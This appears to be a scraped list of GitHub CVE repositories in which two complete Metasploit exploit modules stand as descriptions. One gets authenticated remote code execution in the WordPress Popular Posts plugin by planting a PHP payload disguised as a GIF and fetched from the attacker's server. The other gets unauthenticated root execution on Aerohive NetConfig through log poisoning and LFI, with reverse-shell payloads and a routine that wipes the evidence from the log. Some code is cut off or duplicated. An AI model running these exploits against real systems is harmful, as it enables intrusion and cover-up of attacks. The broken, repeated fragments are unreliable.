\n", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? " normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com// (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?\d+) views =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend** : [Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e](https://github.com/Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e) create time: 2022-01-02T08:08:00Z

**no description** : [darkpills/CVE-2021-24307-all-in-one-seo-pack-admin-rce](https://github.com/darkpills/CVE-2021-24307-all-in-one-seo-pack-admin-rce) create time: 2022-01-02T07:50:09Z

**## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 / normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?[^"]*)/ =~ res.body /},"post":{"id":(?\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "\n

#{Rex::Text.rand_text_alphanumeric(100..200)}

\n", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? " normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com// (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?\d+) views =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen end end** : [Nate0634034090/-nate158.res.codeRex.sleepsession.type.to_s.eql-shell-](https://github.com/Nate0634034090/-nate158.res.codeRex.sleepsession.type.to_s.eql-shell-) create time: 2022-01-02T07:48:47Z

**no description** : [sdogancesur/CVE-2021-44228-github-repository](https://github.com/sdogancesur/CVE-2021-44228-github-repository) create time: 2022-01-01T21:36:40Z

**Log4j-Scanner** : [marklindsey11/gh-repo-clone-marklindsey11--CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CV](https://github.com/marklindsey11/gh-repo-clone-marklindsey11--CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CV) create time: 2022-01-01T20:01:01Z

**The vulnerability affects Apache APISIX Dashboard version 2.10.1** : [itxfahdi/-cve-2021-45232](https://github.com/itxfahdi/-cve-2021-45232) create time: 2022-01-01T19:31:13Z

**no description** : [marklindsey11/-CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CVE-2021-44228-https-nvd.](https://github.com/marklindsey11/-CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CVE-2021-44228-https-nvd.) create time: 2022-01-01T15:13:22Z

**no description** : [Edgarloyola/CVE-2021-40904](https://github.com/Edgarloyola/CVE-2021-40904) create time: 2021-10-12T09:38:48Z

**no description** : [Edgarloyola/CVE-2021-40905](https://github.com/Edgarloyola/CVE-2021-40905) create time: 2021-10-12T09:36:56Z

**no description** : [Edgarloyola/CVE-2021-40906](https://github.com/Edgarloyola/CVE-2021-40906) create time: 2021-10-12T09:30:38Z

**This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, known as Log4Shell.** : [romanutti/log4shell-vulnerable-app](https://github.com/romanutti/log4shell-vulnerable-app) create time: 2021-12-31T20:39:44Z

**Test application for CVE-2018-1285 alert for Solarwinds DLLs** : [alex-ermolaev/Log4NetSolarWindsSNMP-](https://github.com/alex-ermolaev/Log4NetSolarWindsSNMP-) create time: 2021-12-31T18:21:32Z

**no description** : [Rinkal26/cve-2018-8014](https://github.com/Rinkal26/cve-2018-8014) create time: 2021-12-31T16:49:56Z

**no description** : [secureITmania/2021-cve-animes](https://github.com/secureITmania/2021-cve-animes) create time: 2021-12-31T17:14:03Z

**CVE-2021-44832** : [DanielRuf/CVE-2021-44832](https://github.com/DanielRuf/CVE-2021-44832) create time: 2021-12-30T20:24:07Z

**no description** : [morhax/cve-2021-45232-rce](https://github.com/morhax/cve-2021-45232-rce) create time: 2021-12-30T19:59:54Z

**Presents how to exploit CVE-2021-44228 vulnerability.** : [MarceloLeite2604/log4j-vulnerability](https://github.com/MarceloLeite2604/log4j-vulnerability) create time: 2021-12-30T19:10:21Z

**no description** : [cckuailong/log4j_RCE_CVE-2021-44832](https://github.com/cckuailong/log4j_RCE_CVE-2021-44832) create time: 2021-12-29T07:50:05Z

**一个针对shiro反序列化漏洞(CVE-2016-4437)的快速利用工具/A simple tool targeted at shiro framework attacks with ysoserial.** : [4nth0ny1130/shisoserial](https://github.com/4nth0ny1130/shisoserial) create time: 2021-12-23T16:29:59Z

**no description** : [Rinkal26/CVE-2020-17087](https://github.com/Rinkal26/CVE-2020-17087) create time: 2021-12-30T10:43:47Z

**no description** : [wuppp/cve-2021-45232-exp](https://github.com/wuppp/cve-2021-45232-exp) create time: 2021-12-29T07:32:30Z

